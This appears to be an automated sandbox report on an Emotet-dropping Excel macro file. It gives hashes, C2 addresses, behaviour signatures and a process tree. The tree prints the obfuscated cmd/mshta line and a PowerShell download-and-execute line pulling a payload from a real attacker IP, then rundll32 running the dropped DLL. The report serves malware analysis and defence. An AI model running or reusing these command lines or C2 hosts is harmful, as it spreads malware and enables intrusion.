Analysis

  • max time kernel
    144s
  • max time network
    146s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    19-01-2022 10:06

General

  • Target

    086135335.xlsm

  • Size

    114KB

  • MD5

    254ffcdec7238f1444fe24932ce54457

  • SHA1

    f279f9375c94edc055cb29d3d511c2b984eea05a

  • SHA256

    bedfbe47fbde08c3b2471c10061982611d471e5feae913cb7f91e63003a1a5cc

  • SHA512

    559fa4d2a1cb30817e0560c676f077884299dd3ec4a8d1955e7058a63c0e2d4e723c76f68b940353163f45d737d0023128c37cd4be26b2728fd71e0981af224a

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://0x5cff39c3/sec/sec.html

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://92.255.57.195/sec/sec.png

Extracted

Family

emotet

Botnet

Epoch5

C2

45.138.98.34:80

69.16.218.101:8080

51.210.242.234:8080

185.148.168.220:8080

142.4.219.173:8080

54.38.242.185:443

191.252.103.16:80

104.131.62.48:8080

62.171.178.147:8080

217.182.143.207:443

168.197.250.14:80

37.44.244.177:8080

66.42.57.149:443

210.57.209.142:8080

159.69.237.188:443

116.124.128.206:8080

128.199.192.135:8080

195.154.146.35:443

185.148.168.15:8080

195.77.239.39:8080

eck1.plain
ecs1.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • suricata: ET MALWARE W32/Emotet CnC Beacon 3

    suricata: ET MALWARE W32/Emotet CnC Beacon 3

  • Blocklisted process makes network request 7 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 8 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 32 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 44 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\086135335.xlsm
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:604
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c m^sh^t^a h^tt^p^:/^/0x5cff39c3/sec/sec.html
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:844
      • C:\Windows\SysWOW64\mshta.exe
        mshta http://0x5cff39c3/sec/sec.html
        3⤵
        • Blocklisted process makes network request
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:1528
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://92.255.57.195/sec/sec.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1188
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:852
            • C:\Windows\SysWow64\rundll32.exe
              C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
              6⤵
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:1728
              • C:\Windows\SysWOW64\rundll32.exe
                C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer
                7⤵
                • Loads dropped DLL
                • Drops file in System32 directory
                • Suspicious use of WriteProcessMemory
                PID:940
                • C:\Windows\SysWOW64\rundll32.exe
                  C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Nujmpyegmtnpwki\godjiydipgd.jzm",PuZLHTmkON
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1068
                  • C:\Windows\SysWOW64\rundll32.exe
                    C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Nujmpyegmtnpwki\godjiydipgd.jzm",DllRegisterServer
                    9⤵
                    • Blocklisted process makes network request
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1008

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

1
T1112

Discovery

System Information Discovery

2
T1082

Query Registry

1
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Public\Documents\ssd.dll
    MD5

    fcdd109bcdb88089e05aa9dda588ec32

    SHA1

    2ae8c17b9401869aac6db6ceb087eb24083dc317

    SHA256

    634a49dc5351f2453022e7f6eebd8e3dbc44ffda315aece868a79416186ce1a8

    SHA512

    7d6256991f7d5e5af907753311e31d64c07e26ccfbdea8e84432db2cc77d5ed7ffd8ff1ccc9683724ac9dd0291237036e1e5b51559034f61e20fad8ef68ab55e

  • \Users\Public\Documents\ssd.dll
    MD5

    fcdd109bcdb88089e05aa9dda588ec32

    SHA1

    2ae8c17b9401869aac6db6ceb087eb24083dc317

    SHA256

    634a49dc5351f2453022e7f6eebd8e3dbc44ffda315aece868a79416186ce1a8

    SHA512

    7d6256991f7d5e5af907753311e31d64c07e26ccfbdea8e84432db2cc77d5ed7ffd8ff1ccc9683724ac9dd0291237036e1e5b51559034f61e20fad8ef68ab55e

  • \Users\Public\Documents\ssd.dll
    MD5

    fcdd109bcdb88089e05aa9dda588ec32

    SHA1

    2ae8c17b9401869aac6db6ceb087eb24083dc317

    SHA256

    634a49dc5351f2453022e7f6eebd8e3dbc44ffda315aece868a79416186ce1a8

    SHA512

    7d6256991f7d5e5af907753311e31d64c07e26ccfbdea8e84432db2cc77d5ed7ffd8ff1ccc9683724ac9dd0291237036e1e5b51559034f61e20fad8ef68ab55e

  • \Users\Public\Documents\ssd.dll
    MD5

    fcdd109bcdb88089e05aa9dda588ec32

    SHA1

    2ae8c17b9401869aac6db6ceb087eb24083dc317

    SHA256

    634a49dc5351f2453022e7f6eebd8e3dbc44ffda315aece868a79416186ce1a8

    SHA512

    7d6256991f7d5e5af907753311e31d64c07e26ccfbdea8e84432db2cc77d5ed7ffd8ff1ccc9683724ac9dd0291237036e1e5b51559034f61e20fad8ef68ab55e

  • \Users\Public\Documents\ssd.dll
    MD5

    fcdd109bcdb88089e05aa9dda588ec32

    SHA1

    2ae8c17b9401869aac6db6ceb087eb24083dc317

    SHA256

    634a49dc5351f2453022e7f6eebd8e3dbc44ffda315aece868a79416186ce1a8

    SHA512

    7d6256991f7d5e5af907753311e31d64c07e26ccfbdea8e84432db2cc77d5ed7ffd8ff1ccc9683724ac9dd0291237036e1e5b51559034f61e20fad8ef68ab55e

  • \Users\Public\Documents\ssd.dll
    MD5

    fcdd109bcdb88089e05aa9dda588ec32

    SHA1

    2ae8c17b9401869aac6db6ceb087eb24083dc317

    SHA256

    634a49dc5351f2453022e7f6eebd8e3dbc44ffda315aece868a79416186ce1a8

    SHA512

    7d6256991f7d5e5af907753311e31d64c07e26ccfbdea8e84432db2cc77d5ed7ffd8ff1ccc9683724ac9dd0291237036e1e5b51559034f61e20fad8ef68ab55e

  • \Users\Public\Documents\ssd.dll
    MD5

    fcdd109bcdb88089e05aa9dda588ec32

    SHA1

    2ae8c17b9401869aac6db6ceb087eb24083dc317

    SHA256

    634a49dc5351f2453022e7f6eebd8e3dbc44ffda315aece868a79416186ce1a8

    SHA512

    7d6256991f7d5e5af907753311e31d64c07e26ccfbdea8e84432db2cc77d5ed7ffd8ff1ccc9683724ac9dd0291237036e1e5b51559034f61e20fad8ef68ab55e

  • \Users\Public\Documents\ssd.dll
    MD5

    fcdd109bcdb88089e05aa9dda588ec32

    SHA1

    2ae8c17b9401869aac6db6ceb087eb24083dc317

    SHA256

    634a49dc5351f2453022e7f6eebd8e3dbc44ffda315aece868a79416186ce1a8

    SHA512

    7d6256991f7d5e5af907753311e31d64c07e26ccfbdea8e84432db2cc77d5ed7ffd8ff1ccc9683724ac9dd0291237036e1e5b51559034f61e20fad8ef68ab55e

  • \Users\Public\Documents\ssd.dll
    MD5

    fcdd109bcdb88089e05aa9dda588ec32

    SHA1

    2ae8c17b9401869aac6db6ceb087eb24083dc317

    SHA256

    634a49dc5351f2453022e7f6eebd8e3dbc44ffda315aece868a79416186ce1a8

    SHA512

    7d6256991f7d5e5af907753311e31d64c07e26ccfbdea8e84432db2cc77d5ed7ffd8ff1ccc9683724ac9dd0291237036e1e5b51559034f61e20fad8ef68ab55e

  • memory/604-56-0x0000000070DD1000-0x0000000070DD3000-memory.dmp
    Filesize

    8KB

  • memory/604-117-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/604-55-0x000000002F591000-0x000000002F594000-memory.dmp
    Filesize

    12KB

  • memory/604-58-0x0000000075191000-0x0000000075193000-memory.dmp
    Filesize

    8KB

  • memory/604-57-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/940-83-0x0000000000CA0000-0x0000000000CC8000-memory.dmp
    Filesize

    160KB

  • memory/940-85-0x00000000024E0000-0x0000000002508000-memory.dmp
    Filesize

    160KB

  • memory/940-90-0x00000000028D0000-0x00000000028F8000-memory.dmp
    Filesize

    160KB

  • memory/940-77-0x0000000000190000-0x00000000001B8000-memory.dmp
    Filesize

    160KB

  • memory/940-79-0x0000000000410000-0x0000000000438000-memory.dmp
    Filesize

    160KB

  • memory/940-81-0x0000000000C40000-0x0000000000C68000-memory.dmp
    Filesize

    160KB

  • memory/940-87-0x00000000027D0000-0x00000000027F8000-memory.dmp
    Filesize

    160KB

  • memory/1008-107-0x0000000002740000-0x0000000002768000-memory.dmp
    Filesize

    160KB

  • memory/1008-103-0x0000000002380000-0x00000000023A8000-memory.dmp
    Filesize

    160KB

  • memory/1008-113-0x0000000002B50000-0x0000000002B78000-memory.dmp
    Filesize

    160KB

  • memory/1008-95-0x0000000000230000-0x0000000000258000-memory.dmp
    Filesize

    160KB

  • memory/1008-97-0x0000000000900000-0x0000000000928000-memory.dmp
    Filesize

    160KB

  • memory/1008-99-0x0000000000960000-0x0000000000988000-memory.dmp
    Filesize

    160KB

  • memory/1008-101-0x0000000002260000-0x0000000002288000-memory.dmp
    Filesize

    160KB

  • memory/1008-111-0x0000000002A60000-0x0000000002A88000-memory.dmp
    Filesize

    160KB

  • memory/1008-105-0x00000000026A0000-0x00000000026C8000-memory.dmp
    Filesize

    160KB

  • memory/1008-109-0x00000000028E0000-0x0000000002908000-memory.dmp
    Filesize

    160KB

  • memory/1188-63-0x0000000004CB0000-0x00000000051E6000-memory.dmp
    Filesize

    5.2MB

  • memory/1188-61-0x0000000002420000-0x000000000306A000-memory.dmp
    Filesize

    12.3MB

  • memory/1188-62-0x0000000002420000-0x000000000306A000-memory.dmp
    Filesize

    12.3MB

  • memory/1728-70-0x00000000001F0000-0x0000000000218000-memory.dmp
    Filesize

    160KB